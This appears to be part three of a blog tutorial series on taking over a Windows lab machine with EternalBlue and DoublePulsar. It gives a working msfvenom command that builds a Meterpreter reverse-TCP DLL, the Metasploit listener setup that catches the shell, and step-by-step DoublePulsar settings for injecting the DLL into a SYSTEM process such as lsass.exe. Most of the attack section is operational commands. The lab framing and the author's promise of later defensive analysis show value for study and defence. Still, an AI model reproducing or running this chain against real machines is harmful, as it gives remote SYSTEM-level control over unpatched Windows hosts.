
## From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue (Part 3)

(NOTE: This is part three in a short series. If you haven't installed an EternalBlue backdoor in your Victim machine, please read Part 2.)

To recap where we are so far: You've installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you've backdoored your Victim box. You have a Windows Attack box, a Windows Victim box, and a Kali box, and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn't describe your situation. Otherwise, let's hack things.

Now that we have a backdoor installed, we're going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as NT Authority\System, the equivalent of root on a Windows box. For this section of the process, I'll assume the following:

1. You are familiar with the Linux command line.
2. You have basic familiarity with Metasploit, specifically the msfconsole and msfvenom tools. If you aren't familiar with these, Offensive Security's Metasploit Unleashed is a great primer available for free.
3. You have backdoored your Victim box successfully.

Let's start by creating a malicious DLL file. The DLL we create is going to run the payload windows/x64/meterpreter/reverse_tcp which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

1. Use the following command to generate the DLL: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll`. This uses the payload mentioned above, connecting back to 10.0.2.15 on port 9898. It uses the DLL format and writes the payload to a file called meterpreter.dll.
2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run `python -m SimpleHTTPServer` on your Kali box, then use a web browser on the Windows Attack box to browse to http://10.0.2.15:8000 and download it directly.
3. Start up msfconsole on Kali and `use exploit/multi/handler`. We're going to catch our shell here, so use the parameters you set in the DLL by typing `set LPORT 9898`. You can probably get away without setting the LHOST, but if you want to be sure, type `set LHOST 10.0.2.15` as well. Finally, I had some issues with the exploit failing when I didn't set a payload manually. Avoid that by typing `set PAYLOAD windows/x64/meterpreter/reverse_tcp`. Lastly, type `exploit` to start your listener. Lots of info in this step, so here's what you should see:

4. If everything looks good, it's time to go back to the Windows Attack box. Fire up Fuzzbunch if it's not already running, and `use doublepulsar`.

### Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We're going to change some of them, so when you see `Prompt for Variable Settings? [Yes]:`, hit enter.

1. NetworkTimeout [60]: This is fine unless you're on a slow link. Hit enter. If you notice timeouts, come back to this setting and bump it up to 90 or 120 seconds.
2. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now; otherwise, hit enter.
3. TargetPort [445]: DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
4. Protocol: Since we're using SMB here, make sure SMB is selected.
5. Architecture: Make sure you have this set correctly. If you use x86 on an x64 box, you'll get a blue screen of death.
6. Function: DoublePulsar can run shellcode, or run a DLL. Select 2 to Run a DLL.
7. DllPayload []: This is the full path to your Meterpreter DLL on the Attack box, for example C:\temp\meterpreter.dll.
8. DllOrdinal [1]: DLL files export functions by ordinal number as well as by name, and DoublePulsar calls the export at this ordinal. Unfortunately this is out of my scope of knowledge; in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you'll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.
9. ProcessName [lsass.exe]: The process you'll inject into. This is your call: pick something that runs as NT Authority\System, is unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default. This works fine, but some Meterpreter actions (such as hashdump) will likely cause it to crash. You can consider spoolsv.exe, SearchIndexer.exe, and lsm.exe as well; experiment a bit with this field.
10. ProcessCommand []: Optional; the command line of the process to inject into. Leave this blank.
11. Destination IP [10.0.2.7]: Local tunnel IP. For this scenario, leave it as default.
12. Destination Port [445]: Local tunnel port. Again, we'll leave this default.

You should now have a summary of the changes you've made, which should look like this:

If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check for the EternalBlue backdoor, and inject the DLL. You should see a `[+] Doublepulsar Succeeded` message. Here's what the attack looks like from your Windows box:

And now the good part: open up your Kali box. If everything has gone well, you've now got a Meterpreter session open, and you should be running as NT Authority\System. w00t!

In the next post, we'll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are Event Viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.